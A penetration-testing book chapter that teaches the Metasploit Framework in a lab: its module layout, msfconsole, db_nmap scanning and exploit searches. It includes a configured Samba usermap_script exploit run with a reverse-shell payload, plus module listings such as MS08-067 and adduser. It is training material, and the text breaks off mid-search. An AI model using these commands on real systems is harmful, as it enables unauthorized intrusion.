The Metasploit Framework (MSF) is a solid foundation that you can build on for penetration testing, and you can customize it to your needs. The community of ethical hackers considers it one of the most complete collections of exploits, and the Kali Linux makers describe Metasploit as one of the most useful security auditing tools freely available to security professionals. H.D. Moore released the first version in 2003, written in Perl; version 3 (2007) was a complete rewrite in Ruby, and Rapid7 acquired the project in 2009.
Metasploit gives you a rich working environment. From web vulnerability plugins to network information gathering, and from an extensive exploit development environment to commercial-grade exploits, you will hardly find a tool to match it.
Frankly, Metasploit deserves a complete book to cover all its features, so this single chapter will probably not quench your thirst for knowledge about the tool. I encourage you to spend time researching the modules. Since it is free and open source, there is a wide array of helpful articles and forum posts on the Internet. You can also find the developer documentation in the metasploit-framework folder; the next section shows you where.
In this chapter, the victim machine runs Windows XP and the attacking machine runs Kali Linux. At the beginning of this book, I showed you how to install Metasploitable, an intentionally vulnerable Linux virtual machine built for security training; you can practice your penetration testing techniques on it as well. You will also need a Windows virtual machine with Internet Explorer for some of the exploits covered in this chapter.
Understanding the Metasploit Architecture
Understanding the Metasploit architecture is not difficult. You can take a look at the file system to get a feel for what lies inside. In Kali Linux, Metasploit is provided in the /usr/share/metasploit-framework directory.
Here’s some output where you can take a look at the main Metasploit folder:
//code and output of metasploit-framework
root@kali:~# cd /usr/share/metasploit-framework/
root@kali:/usr/share/metasploit-framework# ls
app Gemfile msfconsole msfupdate scripts
config Gemfile.lock msfd msfvenom tools
data lib msfdb plugins vendor
db metasploit-framework.gemspec msfrpc Rakefile
documentation modules msfrpcd ruby
In the output on the screen (not shown here), you will see two colors: blue and green. Entries such as msfconsole are green, meaning they are executables. Entries such as data, lib, and modules are blue; they are directories. When you click Metasploit in your Applications list, msfconsole is executed and a new terminal opens; most of your work in Metasploit happens at that prompt. The lib directory holds the framework's libraries, and they matter: they implement the plumbing that every module relies on, so an exploit author does not have to write code for routine tasks such as making HTTP requests or opening TCP connections.
// code and output of metasploit-framework library
root@kali:/usr/share/metasploit-framework# cd lib/
root@kali:/usr/share/metasploit-framework/lib# ls
anemone metasploit postgres rbmysql.rb snmp telephony
anemone.rb msf postgres_msf.rb rex snmp.rb telephony.rb
enumerable.rb msfenv.rb rabal rex.rb sqlmap windows_console_color_support.rb
metasm net rbmysql robots.rb tasks
The files ending with .rb are all Ruby files because the Metasploit framework was written in Ruby language.
Understanding how things are stored in and related to the Metasploit file system will definitely help you use msfconsole and the other Metasploit interfaces. Understanding Metasploit modules is also crucial, because almost all interaction with Metasploit happens through these modules. Modules live in two places. The primary location is /usr/share/metasploit-framework/modules/.
// code and output of metasploit-framework modules
root@kali:/usr/share/metasploit-framework# cd modules/
root@kali:/usr/share/metasploit-framework/modules# ls
auxiliary encoders exploits nops payloads post
Penetration testers keep their custom modules under the hidden .msf4 directory in their home directory, which mirrors the same layout (a new exploit goes in ~/.msf4/modules/exploits/, for example, and msfconsole loads it alongside the built-in ones).
//code
root@kali:~# cd ~/.msf4
root@kali:~/.msf4# ls
history local logos logs modules plugins
All Metasploit modules are organized into separate directories by type. Exploit modules are the ones that deliver a payload to a target; payloads are the code that runs on the target after exploitation; and nops generate no-operation instruction sequences, which keep payload sizes consistent across exploit attempts and give the payload padding to land on. You will learn more about them in the next section.
// code and output of metasploit-framework exploits
root@kali:~# ls /usr/share/metasploit-framework/modules/exploits/
aix bsdi firefox irix multi solaris
android dialup freebsd linux netware unix
apple_ios example.rb hpux mainframe osx windows
There are different platform directories inside, such as apple_ios, windows, and more. If you go inside windows, you will find lots of subdirectories, including antivirus, backdoor, firewall, mysql, mssql, and many more. Go one level further into mysql, ftp, or browser and you will find a set of Ruby files. These are the actual modules, written in Ruby, that msfconsole loads and runs for you.
Auxiliary modules include port scanners, fuzzers, sniffers, and more. In most cases, you will use the scanners, which are explained in the next section.
// code and output of metasploit-framework auxiliary part of modules
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/
admin client dos gather scanner spoof vsploit
analyze crawler example.rb parser server sqli
bnat docx fuzzers pdf sniffer voip
Payloads, Encoders, Nops
Summarizing Modules
Metasploit offers several interfaces, chiefly msfconsole, to the modules that do the actual work of exploitation. The console is the fastest way to work, because every attack command is available from a single prompt.
You can either start it from the Kali Linux terminal or pick it up from the Applications menu.
Let’s first start Metasploit and create a workspace. You will test Metasploit inside this workspace.
// code and output of metasploit-framework workspace
msf > workspace
* default
msf > workspace -a sanjib
[*] added workspace sanjib
msf > workspace -h
Usage:
workspace List workspaces
workspace -v List workspaces verbosely
workspace [name] Switch workspace
workspace -a [name] ... Add workspace(s)
workspace -d [name] ... Delete workspace(s)
workspace -D Delete all workspaces
workspace -r <old> <new> Rename workspace
workspace -h Show this help information
msf > workspace sanjib
[*] Workspace: sanjib
msf >
Let’s look at the previous code. The first command lists the workspaces; the asterisk marks the active one, which is the default workspace (named default). You can get help with the -h switch. Then you switch into the newly created workspace, sanjib, and everything you record from now on (hosts, services, loot) is kept separate from other engagements. You will work in it in the next sections. Before getting your hands dirty with actual work, here is a quick overview of the functions that Metasploit modules have.
The modules have a few specific functions. Consider the payload first. After a successful exploitation, the payload starts working: it is the code that runs on the compromised target and implements the commands needed to get work done, such as a command shell or a Meterpreter session. You will see examples in the coming sections. Penetration testers target a specific vulnerability first, and after that the payload takes over. The exploit modules do the first part. Active exploits attack a specific target, run until completed, and then exit. Passive exploits wait for incoming clients such as FTP clients or web browsers and then exploit them.
There is another important set of modules, called auxiliary modules. They do not directly establish a connection between a penetration tester and the target system; instead they perform supporting actions such as scanning, fuzzing, or sniffing that feed the exploit modules.
You also need to know about the encoder modules. Encoders transform the payload bytes before delivery. Their original purpose is to remove bytes the exploit cannot transmit (a NUL byte in a string overflow, for example). Because encoding also changes the payload's byte pattern, it was once useful against signature-based antivirus, but modern antivirus and EDR products recognize the common encoders, so do not rely on them for evasion. There are also post modules; they run on already compromised targets to gather useful data and pivot the attacker deeper into the target network.
Finally, there are the nop modules, which you will find under modules/nops. A nop generator produces sequences of no-operation instructions (or instructions with no useful side effects) that pad a buffer overflow payload, so that execution can land anywhere in the padding and still slide into the payload.
Now that you know some of the basic modules of Metasploit, you can see Metasploit in action.
Type this command:
// code and output of using nmap in metasploit-framework
msf > nmap -sV 192.168.2.2
msfconsole passes commands it does not recognize to the underlying shell, so Nmap runs as usual and its output appears in your Kali Linux terminal:
//output
[*] exec: nmap -sV 192.168.2.2
Starting Nmap 7.60 ( https://nmap.org ) at 2018-06-05 06:18 IST
Nmap scan report for 192.168.2.2
Host is up (0.000093s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: SS-H81M-S1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds
msf >
This performs a simple Nmap version scan of the host machine’s IP address. Several services were identified. As a penetration tester, you can investigate any of them for known vulnerabilities, starting with Metasploit’s own collection of exploits.
You can start the search for exploits on the Samba server using this command:
//code of using "search" in Metasploit
msf > search samba
This lists every module whose name or description matches the term (the output below is abbreviated). Choose by rank, and by whether the description matches the version you actually found.
//the output of search
exploit/multi/samba/usermap_script
exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Exe
Here you will use exploit/multi/samba/usermap_script because it is ranked as excellent. The info command gives you more details about this exploit:
//code of using "info"
msf > info exploit/multi/samba/usermap_script
//output
Name: Samba "username map script" Command Execution
Module: exploit/multi/samba/usermap_script
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2007-05-14
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port (TCP)
Payload information:
Space: 1024
Description:
This module exploits a command execution vulnerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
"username map script" configuration option. By specifying a username containing shell metacharacters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!
References:
https://cvedetails.com/cve/CVE-2007-2447/
OSVDB (34700)
http://www.securityfocus.com/bid/23972
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
http://samba.org/samba/security/CVE-2007-2447.html
If you are interested in reading more, the information page gives you a few good links. When you are starting your career as a security professional, it is good to visit as many web sites as possible where ethical hackers post their articles.
Here you set the target machine’s IP address with RHOST and the port with RPORT (recent Metasploit versions name the option RHOSTS; show options tells you which one your installation uses). After that, you can proceed to the exploit.
The preceding output gives you the details you need to move forward. The next lines of code show how to use that exploit against the host machine’s IP address:
//code of using the exploit
msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(multi/samba/usermap_script) > set RHOST 192.168.2.2
RHOST => 192.168.2.2
msf exploit(multi/samba/usermap_script) > set RPORT 139
RPORT => 139
msf exploit(multi/samba/usermap_script) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(multi/samba/usermap_script) > exploit
The remote host (RHOST) is the system being attacked, so never point it at a live system unless you have written authorization to test that system. The local host (LHOST) is the system that launches the attack and receives the reverse shell, so it must be an address the target can reach. Be careful with Metasploit: you must know what you are doing.
Type one command after another and watch the output in your Kali Linux Metasploit terminal. For the remote host, I have chosen my host machine’s IP address, and for the local host, my virtual machine’s IP address; replace these with your own. Also check the version before you fire: the module description says Samba 3.0.20 through 3.0.25rc3, while the Nmap output above reports Samba 3.X - 4.X on an Ubuntu host running Apache 2.4.7, which is a far newer release, so against that host the exploit will simply fail. Metasploitable 2 runs Samba 3.0.20, which is why it is the usual target for this module.
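Before firing usermap_script, it is worth encoding the version check that the module's description implies. The following Ruby is an added example, not part of this chapter or of Metasploit: it parses Nmap service lines (constructed here for the illustration) and reports whether the advertised Samba version falls in the 3.0.20 through 3.0.25rc3 range. The function names and sample lines are assumptions made for this example. Remember that a banner is a hint, not proof: vendors backport fixes without changing the version string, and a vague banner such as "3.X - 4.X" cannot decide the question at all.

```ruby
# Added example, not from the chapter or from Metasploit: check whether the
# Samba version Nmap advertises is inside the range usermap_script targets.
# The sample Nmap service lines below are constructed for this illustration.

SAMPLE_NMAP = <<~NMAP
  139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
  445/tcp open netbios-ssn Samba smbd 3.0.25rc3
  445/tcp open netbios-ssn Samba smbd 3.0.25
  445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
NMAP

# Range taken from the module's own description: 3.0.20 through 3.0.25rc3.
VULN_MIN   = [3, 0, 20].freeze
VULN_FINAL = [3, 0, 25].freeze   # 3.0.25 final carries the fix; only rc1-rc3 are affected

# Pull "Samba smbd X.Y.Z[rcN]" out of a service line.
# Returns nil when Nmap could only guess a range such as "3.X - 4.X".
def parse_samba_version(line)
  m = line.match(/Samba smbd (\d+)\.(\d+)\.(\d+)(?:rc(\d+))?/)
  return nil unless m
  { ver: [m[1].to_i, m[2].to_i, m[3].to_i], rc: m[4] && m[4].to_i }
end

# :vulnerable, :not_vulnerable, or :unknown when the banner is too vague to decide.
def usermap_script_status(line)
  v = parse_samba_version(line)
  return :unknown if v.nil?
  return :not_vulnerable if (v[:ver] <=> VULN_MIN) < 0       # older than 3.0.20
  return :vulnerable     if (v[:ver] <=> VULN_FINAL) < 0     # 3.0.20 .. 3.0.24
  return :vulnerable     if v[:ver] == VULN_FINAL && v[:rc]  # 3.0.25rc1 .. rc3
  :not_vulnerable                                            # 3.0.25 final or newer
end

# Triage a block of Nmap output: one [port, status] pair per service line.
def triage(nmap_text)
  nmap_text.lines.map(&:strip).reject(&:empty?).map do |line|
    [line[%r{\A\d+/tcp}], usermap_script_status(line)]
  end
end

if __FILE__ == $0
  triage(SAMPLE_NMAP).each { |port, status| puts "#{port}: #{status}" }
end
```

Run it against the real service lines from your own scan (or feed it the output of services in msfconsole) and treat :unknown as "go and fingerprint properly", for example with auxiliary/scanner/smb/smb_version, before wasting an exploit attempt.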
You can also verify that your virtual machines can reach each other and that your network configuration works. This matters, because later you will scan your whole lab network and see which machines are running on it.
Let’s open Kali Linux and Windows XP in virtual machines and, from Kali, ping the Windows virtual machine’s IP address as shown here:
//pinging guest Windows IP
ping xx.x.x.xx
PING xx.x.x.xx (xx.x.x.xx) 56(84) bytes of data.
64 bytes from xx.x.x.xx: icmp_seq=1 ttl=64 time=0.024 ms
64 bytes from xx.x.x.xx: icmp_seq=2 ttl=64 time=0.029 ms
64 bytes from xx.x.x.xx: icmp_seq=3 ttl=64 time=0.020 ms
64 bytes from xx.x.x.xx: icmp_seq=4 ttl=64 time=0.030 ms
64 bytes from xx.x.x.xx: icmp_seq=5 ttl=64 time=0.028 ms
64 bytes from xx.x.x.xx: icmp_seq=6 ttl=64 time=0.035 ms
64 bytes from xx.x.x.xx: icmp_seq=7 ttl=64 time=0.022 ms
64 bytes from xx.x.x.xx: icmp_seq=8 ttl=64 time=0.030 ms
^C
--- xx.x.x.xx ping statistics ---
8 packets transmitted, 8 received, 0% packet loss, time 204ms
At the same time, in your virtual Windows XP machine, ping the Kali Linux IP address to see the result.
You can change the Kali Linux IP address with this command. The change is temporary (it is lost at the next reboot or DHCP renewal), and the address you pick must be in the same subnet as the Windows VM:
//changing IP of Kali Linux
ifconfig eth0 xx.x.x.xx
Now try pinging from Windows again and see the results.
To get more of a feel for msfconsole, you can scan your network again to see which machines are currently up. Before starting the scan, type ? in msfconsole and look at the results. You can also issue a single command such as hosts to see what you get. The hosts table is filled only from scans Metasploit records, so it stays empty until you run db_nmap (or import results with db_import); a plain nmap run from the prompt, like the one above, is not recorded. Once a db_nmap scan is over, the table is populated.
Mixins and Plugins in Ruby
Before discussing Metasploit further, let’s look at Ruby, because every module in the Metasploit Framework is a Ruby class. This section is a brief overview.
Ruby is a dynamic, object-oriented, interpreted, general-purpose programming language. Metasploit modules inherit their attributes and methods from type-specific classes (Msf::Exploit, Msf::Auxiliary, Msf::Post, and so on), and the modules share a common application programming interface (API). An API is a set of functions and procedures that let you build applications which access the features or data of an operating system, application, or other service. Payloads are slightly different: they are assembled at runtime from components (a stager plus a stage, for example). Another notable facet of these classes is that they all descend from one parent class, Msf::Module.
A little object-oriented programming knowledge helps with another important point: Metasploit modules can add new methods, and they can also override the ones they inherit.
You will also see the term mixins used frequently in Metasploit. Mixins are a Ruby feature: a Ruby module (a bundle of methods, not to be confused with a Metasploit module) is “mixed in” to a class with include, and the class gains its methods. This differs from the single inheritance of other object-oriented languages, although it has similarities. For now, note a few things. Mixins let a module class override methods and add features, whether protocol-specific (TCP, HTTP, SMB) or behavior-specific (brute force, scanning). The connect method is implemented by the TCP mixin and then overloaded by the mixins for other network protocols, and the scanner mixin overloads the run method so that a scanner module author writes only the per-host logic.
On the other hand, plugins work directly with the API. They manipulate the overall framework and hook into the event system. Because of that, plugins easily automate tasks that would be tedious if you wanted to do them manually. By the way, plugins work only in msfconsole. With the help of plugins, you can add new console commands to extend the framework functionality as a whole.
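To make the mixin and inheritance points concrete, here is an added example that is not Metasploit’s own code: a toy reconstruction, in plain Ruby, of how the framework composes a module from one shared base class and a stack of mixins. The names BaseModule, Tcp, HttpClient, Scanner, run_host and the datastore keys are chosen to echo the real Msf::Module, Msf::Exploit::Remote::Tcp and Msf::Auxiliary::Scanner, but they are assumptions for this illustration; the code runs without the framework, against a throwaway listener it opens itself on 127.0.0.1.

```ruby
# Added example, not Metasploit source: a toy model of the framework's
# mixin layering. Names mirror the real ones but are assumptions.
require 'socket'

# The single parent all module types share (Msf::Module in the framework).
class BaseModule
  attr_reader :datastore, :info

  def initialize(info = {})
    @info = info
    @datastore = {}   # option values, the equivalent of "set NAME value"
  end
end

# Behaviour-specific mixin: connect is written once here, not in every module.
module Tcp
  def connect(host = datastore['RHOST'], port = datastore['RPORT'])
    Socket.tcp(host, port, connect_timeout: 1)
  end
end

# Protocol-specific mixin that overloads connect but reuses Tcp's via super,
# the way the framework's HTTP client layers on top of the TCP mixin.
module HttpClient
  include Tcp

  def connect(host = datastore['RHOST'], port = datastore['RPORT'])
    sock = super
    sock.write("HEAD / HTTP/1.0\r\nHost: #{host}\r\n\r\n")
    sock
  end
end

# Scanner mixin: overloads run so a module author only writes run_host.
module Scanner
  def run
    hosts = datastore['RHOSTS'].to_s.split(/[\s,]+/)
    hosts.each_with_object({}) { |h, results| results[h] = run_host(h) }
  end
end

# A concrete auxiliary module: its own code is just run_host.
class TcpPortCheck < BaseModule
  include Tcp
  include Scanner

  def run_host(host)
    connect(host, datastore['RPORT']).close
    :open
  rescue SystemCallError, SocketError
    :closed
  end
end

# Same shape, different protocol mixin: connect now resolves to HttpClient's.
class HttpHeadCheck < BaseModule
  include HttpClient
  include Scanner

  def run_host(host)
    connect(host, datastore['RPORT']).close
    :sent
  rescue SystemCallError, SocketError
    :closed
  end
end

# Stand-alone demonstration against a throwaway loopback listener (no real target).
def demo
  srv  = TCPServer.new('127.0.0.1', 0)      # port 0: let the OS pick a free port
  port = srv.addr[1]
  mod  = TcpPortCheck.new('Name' => 'Toy TCP port check')
  mod.datastore['RHOSTS'] = '127.0.0.1'
  mod.datastore['RPORT']  = port
  while_open = mod.run                       # {"127.0.0.1"=>:open}
  srv.close
  after_close = mod.run                      # {"127.0.0.1"=>:closed}
  {
    open: while_open,
    closed: after_close,
    # Ruby resolves methods along this chain; the last include comes first.
    ancestors: TcpPortCheck.ancestors.first(4).map(&:name),
    tcp_connect_owner: TcpPortCheck.instance_method(:connect).owner.name,
    http_connect_owner: HttpHeadCheck.instance_method(:connect).owner.name
  }
end

puts demo if __FILE__ == $0
```

The ancestors list is the point: TcpPortCheck’s own class comes first, then Scanner, then Tcp, then BaseModule, so a call to run finds Scanner’s version, which calls the module’s run_host, which calls Tcp’s connect. Swap Tcp for HttpClient and the same run_host transparently gets the HTTP-aware connect. A real Metasploit module uses exactly this shape, with the framework supplying the mixins.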
Like Python, Ruby is easier to learn than C++, so it is worth learning at least its basics. That will help you understand Metasploit better.
Finally, you may ask, why instead of using Python or C++ did the Metasploit makers choose Ruby? After all, Ruby is not a popular choice in security programming.
Well, it’s better to listen to the makers of Metasploit. In the documentation, they put it this way:
“The Python programming language was also a language candidate. The reason the Metasploit staff opted for Ruby instead of Python was for a few different reasons. The primary reason is a general distaste for some of the syntactical annoyances forced by Python, such as block indention. While many would argue the benefits of such an approach, some members of the Metasploit staff find it to be an unnecessary restriction. Other issues with Python center around limitations in parent class method calling and backward compatibility of interpreters.”
As a Python lover, you may disagree with this argument, but that should not stop you from using Metasploit; after all, it is one of the best ethical hacking tools available. Metasploit’s capabilities are staggering, especially with the open extensions through plugins and modules. It is not only powerful but versatile.
Metasploit Console or Interface
The command-line interface to the Metasploit Framework is extremely powerful. This interface is what opens when you open Metasploit Framework from the Kali Linux Application toolbar.
Let’s open the Metasploit console and issue the ? command.
You will get a long listing, and explaining all of it is beyond the scope of this book. The part that matters here is the database back-end commands:
//output "?" command
Database Backend Commands
=========================
Command Description
------- -----------
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
Now you can check the database status. Issue the following command on your terminal:
//code of database status
msf > db_status
[*] postgresql connected to msf
msf >
The output shows that msfconsole is connected to its PostgreSQL database (named msf). If it reports no connection instead, run msfdb init from a Kali shell first; without the database, the workspace, hosts, and db_nmap commands have nowhere to store results.
Now you are ready to move on to the db_nmap command and scan the lab network, recording the results. This time I am using db_nmap via VMware Player on a Windows 7 host machine, with virtual Kali Linux and virtual Windows XP both running.
The help text says clearly what db_nmap does:
//description of using db_nmap
db_nmap Executes nmap and records the output automatically
It executes an Nmap scan and records the output in the database automatically. You have already learned about Nmap; in versatility it is nearly Metasploit’s equal, and the two together turn a scan straight into a target list.
Issue the following command to check the status of every address in the /24 network (256 addresses, of which 254 are usable hosts). Use the subnet your virtual machines actually sit on; the output below comes from VMware’s 192.168.139.0/24 NAT network:
//code of using db_nmap
db_nmap -A 192.168.139.0/24 -vv
This runs nmap and keeps a record of the output. The output is fairly long, so I won’t list it all here, but these lines are interesting:
//part outputs
[*] Nmap: Nmap scan report for 192.168.139.1
[*] Nmap: Host is up, received arp-response (0.00021s latency).
[*] Nmap: Scanned at 2018-06-06 19:55:30 EDT for 137s
[*] Nmap: Not shown: 988 closed ports
[*] Nmap: Reason: 988 resets
[*] Nmap: PORT STATE SERVICE REASON VERSION
[*] Nmap: 135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds syn-ack ttl 128 Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
[*] Nmap: 902/tcp open ssl/vmware-auth syn-ack ttl 128 VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
[*] Nmap: 912/tcp open vmware-auth syn-ack ttl 128 VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
[*] Nmap: 1947/tcp open http syn-ack ttl 128 Aladdin/SafeNet HASP license manager 12.49
This is my host machine, which is Windows 7. Open ports mean exposed services, not proven vulnerabilities; whether any of them is exploitable depends on its version and patch level. I have left the machine like this to show you what you will see in the majority of cases. Note that a host firewall that blocked 135, 139, and 445 from the network would hide exactly the services the SMB exploits later in this chapter need, so the fact that these ports are reachable is what makes the host interesting to Nmap and Metasploit.
The -A option also runs Nmap’s default NSE scripts, and the nbstat script reports NetBIOS names and MAC addresses (00:50:56:c0:00:08 for the Windows 7 host and 00:50:56:FB:98:F8 for Windows XP). Here is the Names block for the Windows 7 host:
// more output of using db_nmap
[*] Nmap: | Names:
[*] Nmap: | SS-PC<00> Flags: <unique><active>
[*] Nmap: | WORKGROUP<00> Flags: <group><active>
[*] Nmap: | SS-PC<20> Flags: <unique><active>
[*] Nmap: | WORKGROUP<1e> Flags: <group><active>
[*] Nmap: | WORKGROUP<1d> Flags: <unique><active>
[*] Nmap: | \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
At the end of the output, you get these lines:
//the end output
[*] Nmap: Completed NSE at 19:57, 0.00s elapsed
[*] Nmap: Read data files from: /usr/bin/../share/nmap
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 256 IP addresses (4 hosts up) scanned in 143.53 seconds
[*] Nmap: Raw packets sent: 5671 (251.038KB) | Rcvd: 4073 (169.906KB)
Now the time has come to issue the hosts command and see what you get. It lists every host in the database:
//output of using "hosts" command
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.139.1 00:50:56:c0:00:08 Windows 7 client
192.168.139.2 00:50:56:f8:ef:30 Player device
192.168.139.137
192.168.139.254 00:50:56:FB:98:F8 Windows XP SP2
msf >
The last entry captured in the scan is the virtual Windows XP machine. You now have not only its IP address but also its MAC address and service pack level, which is exactly what you need to pick an exploit and its target.
Exploits and Payloads in Metasploit
Metasploit is all about exploitation, so the first command most people reach for is show exploits, which lists every exploit in the Metasploit Framework. You’ll come back to this in the next section.
There are two types of exploits: active and passive. Active exploits run against a specific target, and module execution stops when an error occurs. Passing -j to exploit runs an active module as a background job.
Passive exploits almost always focus on the client side, such as web browsers or FTP clients: the module sets up a listener and waits. The sessions they produce are listed with sessions -l, and sessions -i <id> interacts with one of those shells. Another advantage of passive exploits is that they can be delivered by e-mail, with the link pointing at the listener. In Metasploit, after a successful exploitation a payload starts working. As I said earlier, the payload is the code that runs on the target and carries out the post-exploitation work.
Penetration testers usually set a specific target, and then the active exploit runs. A passive exploit waits for clients, such as web browsers, to connect; once a client connects, the exploit fires.
How to Use Exploit and Payloads
There are thousands of exploits and hundreds of payloads available in Metasploit. What type of exploitation do you want to do? You can target the guest Windows XP machine and expose its vulnerabilities.
Open the Metasploit Framework, and you will be greeted with how many exploits there are to use.
//the total exploits and payloads
+ -- --=[ 1722 exploits - 986 auxiliary - 300 post ]
+ -- --=[ 507 payloads - 40 encoders - 10 nops
After that, issue the show exploits command and check the output. Next, you can check out the other options available.
//code of showing exploits
msf > show exploits
Name Disclosure Date Rank Description
---- --------------- ---- -----------
aix/local/ibstat_path 2013-09-24 excellent ibstat $PATH Privilege Escalation
aix/rpc_cmsd_opcode21 2009-10-07 great AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
aix/rpc_ttdbserverd_realpath 2009-06-17 great ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
android/adb/adb_server_exec 2016-01-01 excellent Android ADB Debug Server Remote Payload Execution
android/browser/samsung_knox_smdm_url 2014-11-12 excellent Samsung Galaxy KNOX Android Browser RCE
android/browser/stagefright_mp4_tx3g_64bit 2015-08-13 normal Android Stagefright MP4 tx3g Integer Overflow
android/browser/webview_addjavascriptinterface 2012-12-21 excellent Android Browser and WebView addJavascriptInterface Code Execution
android/fileformat/adobe_reader_pdf_js_interface 2014-04-13 good Adobe Reader for Android addJavascriptInterface Exploit
android/local/futex_requeue 2014-05-03 excellent Android 'Towelroot' Futex Requeue Kernel Exploit
android/local/put_user_vroot 2013-09-06 excellent Android get_user/put_user Exploit
apple_ios/browser/safari_libtiff 2006-08-01 good Apple iOS MobileSafari LibTIFF Buffer Overflow
apple_ios/email/mobilemail_libtiff 2006-08-01 good Apple iOS MobileMail LibTIFF Buffer Overflow
apple_ios/ssh/cydia_default_ssh 2007-07-02 excellent Apple iOS Default SSH Password Vulnerability
....
This is a long list, cut short here. For Windows-specific exploitation, you can also use the search command; you can search for anything in Metasploit. DCOM (Distributed Component Object Model) is the Microsoft protocol for invoking objects on other computers over RPC, and it ships with Windows, so searching for it turns up the classic RPC exploits:
// output of dcom
msf > search dcom
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/telnet/telnet_ruggedcom normal RuggedCom Telnet Password Generator
exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great MS03-026 Microsoft RPC DCOM Interface Overflow
exploit/windows/smb/ms04_031_netdde 2004-10-12 good MS04-031 Microsoft NetDDE Service Overflow
exploit/windows/smb/psexec_psh 1999-01-01 manual Microsoft Windows Authenticated Powershell Command Execution
This gives you a focused listing. Note that search matches substrings, so auxiliary/scanner/telnet/telnet_ruggedcom appears only because “RuggedCom” contains “dcom”; it has nothing to do with Windows. The module that matters for Windows XP here is exploit/windows/dcerpc/ms03_026_dcom.
You can also search for the Server service’s NetAPI functions (netapi) to find the well-known SMB exploits against unpatched Windows, all of them memory corruption bugs in path handling:
//searching netapi
msf > search netapi
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms03_049_netapi 2003-11-11 good MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
exploit/windows/smb/ms06_040_netapi 2006-08-08 good MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
There are also adduser payloads. A payload does not exploit anything by itself, but paired with one of the exploits above (ms08_067_netapi against an unpatched Windows XP, for example) windows/adduser creates a new local account on the target:
//searching adduser
msf > search adduser
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
payload/cmd/windows/adduser normal Windows Execute net user /ADD CMD
payload/linux/armle/adduser normal Linux Add User
payload/linux/x86/adduser normal Linux Add User
payload/windows/adduser normal Windows Execute net user /ADD
The first step is to pick the exploit, and then you attach the payload that should run once it succeeds. Use the show payloads command to see what payloads exist:
//code and output of showing payloads
msf > show payloads
Name Disclosure Date Rank Description
---- --------------- ---- -----------
aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline
aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline
aix/ppc/shell_interact normal AIX execve Shell for inetd
aix/ppc/shell_reverse_tcp normal AIX Command Shell, Reverse TCP Inline
android/meterpreter/reverse_http normal Android Meterpreter, Android Reverse HTTP Stager
android/meterpreter/reverse_https normal Android Meterpreter, Android Reverse HTTPS Stager
android/meterpreter/reverse_tcp normal Android Meterpreter, Android Reverse TCP Stager
android/meterpreter_reverse_http normal Android Meterpreter Shell, Reverse HTTP Inline
android/meterpreter_reverse_https normal Android Meterpreter Shell, Reverse HTTPS Inline
android/meterpreter_reverse_tcp normal Android Meterpreter Shell, Reverse TCP Inline
...
I have cut the output short here, as this is very long.
How to Start Exploits
Starting exploits is fairly simple once you know the technique. Here I will show how to exploit my guest Windows XP machine and create a directory on it, using the Metasploit Framework in Kali Linux. First search for the exploit you need:
//code of searching specific exploit
msf > search chunksize
Only the first line of the result actually matches the term chunksize: the MS07-017 animated cursor (ANI) exploit, a browser-delivered stack buffer overflow in Windows’ LoadAniIcon() handling. The other three are neighboring windows/browser entries from the longer listing. The output looks like this:
//the search result
